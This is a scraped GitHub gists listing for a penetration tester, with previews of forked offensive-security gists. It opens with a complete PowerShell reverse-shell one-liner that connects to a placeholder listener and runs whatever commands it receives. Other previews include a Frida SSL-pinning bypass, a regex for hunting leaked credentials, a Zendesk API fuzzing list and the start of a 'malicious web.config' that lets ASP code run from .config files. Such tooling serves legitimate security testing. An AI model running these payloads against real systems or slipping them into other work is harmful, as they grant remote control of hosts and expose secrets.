A combination of my own methodology and the Web Application Hacker's Handbook Task checklist, as a Github-Flavored Markdown file
Nasur Ullah Spy0x7
💢
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| powershell -nop -exec bypass -c "$client = New-Object System.Net.Sockets.TCPClient('<LISTENERIP>',443);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()" |
Spy0x7
/ report.py
Created
February 13, 2024 11:57
— forked from Huntinex/report.py
Automatic bug bounty report generator
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| import poe, sys | |
| client = poe.Client("<POE_API_KEY_HERE>") | |
| title=sys.argv[1] | |
| path=sys.argv[2] | |
| more="" | |
| if len(sys.argv) > 3: | |
| more="\" and here is more information: "+sys.argv[3] | |
| message="""generate a bug bounty report for me (hackerone.com), the title of the bug is """+title+""" and the vulnerability path is \""""+path+more+""" |
Spy0x7
/ Testing_Checklist.md
Created
February 7, 2024 17:44
— forked from jhaddix/Testing_Checklist.md
Fast Simple Appsec Testing Checklist
Spy0x7
/ zendesk_endpoints.txt
Created
July 18, 2023 20:52
— forked from win3zz/zendesk_endpoints.txt
List of Zendesk API Endpoints for Fuzzing [Penetration Testing]
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| POST /api/v2/accounts | |
| GET /api/v2/activities?since=cstest | |
| GET /api/v2/audit_logs?filter[source_type]=cstest&filter[source_id]=1&filter[actor_id]=1&filter[ip_address]=cstest&filter[created_at]=cstest&filter[action]=cstest&sort_by=cstest&sort_order=cstest&sort=cstest | |
| GET /api/v2/automations | |
| POST /api/v2/automations | |
| GET /api/v2/bookmarks | |
| POST /api/v2/bookmarks | |
| GET /api/v2/brands | |
| POST /api/v2/brands | |
| GET /api/v2/custom_objects |
Spy0x7
/ Exploitation.md
Created
July 15, 2023 15:52
— forked from yezz123/Exploitation.md
Pentesting-Exploitation
Pentesting-Exploitation Programs and Commands , Protocols Network / Ports
Spy0x7
/ download_apks.sh
Created
January 8, 2023 20:46
— forked from lauritzh/download_apks.sh
Ever wanted to obtain an APK from an Android device? You do not need to install fancy Apps for this, ADB and the following minimal Bash script is sufficient to do so. Use the App's bundle identifier as first argument.
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/bin/bash | |
| # Usage: ./download_apks.sh com.example.app | |
| BUNDLE_FILES=$(adb shell pm path "$1") | |
| for file in $BUNDLE_FILES; do | |
| CLEAN=$(echo "$file"|sed 's/[^:]*://') | |
| adb pull "$CLEAN" . | |
| done |
Spy0x7
/ mixunpin.js
Last active
January 8, 2023 20:39
— forked from incogbyte/mixunpin.js
Frida script to bypass common methods of sslpining Android
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| console.log("[*] SSL Pinning Bypasses"); | |
| console.log(`[*] Your frida version: ${Frida.version}`); | |
| console.log(`[*] Your script runtime: ${Script.runtime}`); | |
| /** | |
| * by incogbyte | |
| * Common functions | |
| * thx apkunpacker, NVISOsecurity, TheDauntless | |
| * Remember that sslpinning can be custom, and sometimes u need to reversing using ghidra,IDA or something like that. | |
| * !!! THIS SCRIPT IS NOT A SILVER BULLET !! |
Spy0x7
/ Generic keys
Last active
January 5, 2023 16:49
— forked from h4x0r-dz/Generic keys
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| (?i)((access_key|access_token|admin_pass|admin_user|algolia_admin_key|algolia_api_key|alias_pass|alicloud_access_key|amazon_secret_access_key|amazonaws|ansible_vault_password|aos_key|api_key|api_key_secret|api_key_sid|api_secret|api.googlemaps AIza|apidocs|apikey|apiSecret|app_debug|app_id|app_key|app_log_level|app_secret|appkey|appkeysecret|application_key|appsecret|appspot|auth_token|authorizationToken|authsecret|aws_access|aws_access_key_id|aws_bucket|aws_key|aws_secret|aws_secret_key|aws_token|AWSSecretKey|b2_app_key|bashrc password|bintray_apikey|bintray_gpg_password|bintray_key|bintraykey|bluemix_api_key|bluemix_pass|browserstack_access_key|bucket_password|bucketeer_aws_access_key_id|bucketeer_aws_secret_access_key|built_branch_deploy_key|bx_password|cache_driver|cache_s3_secret_key|cattle_access_key|cattle_secret_key|certificate_password|ci_deploy_password|client_secret|client_zpk_secret_key|clojars_password|cloud_api_key|cloud_watch_aws_access_key|cloudant_password|cloudflare_api_key|cloudflare_auth_k |
Spy0x7
/ ports.py
Created
December 9, 2022 18:27
— forked from pry0cc/ports.py
Get all ports from an nmap XML output file in the host:ip format
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/usr/bin/env python | |
| ## $ ports.py nmap.xml | |
| ## 8.8.8.8:80 | |
| ## 8.8.8.8:443 | |
| ## 8.8.8.8:3305 | |
| #install requirements: pip install python-libnmap | |
| #uses python 2 |
Spy0x7
/ downloader web.config
Created
December 6, 2022 12:57
— forked from gazcbm/downloader web.config
Malicious web.config's
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| <?xml version="1.0" encoding="UTF-8"?> | |
| <configuration> | |
| <system.webServer> | |
| <handlers accessPolicy="Read, Script, Write"> | |
| <add name="web_config" path="*.config" verb="*" modules="IsapiModule" scriptProcessor="%windir%\system32\inetsrv\asp.dll" resourceType="Unspecified" requireAccess="Write" preCondition="bitness64" /> | |
| </handlers> | |
| <security> | |
| <requestFiltering> | |
| <fileExtensions> | |
| <remove fileExtension=".config" /> |
NewerOlder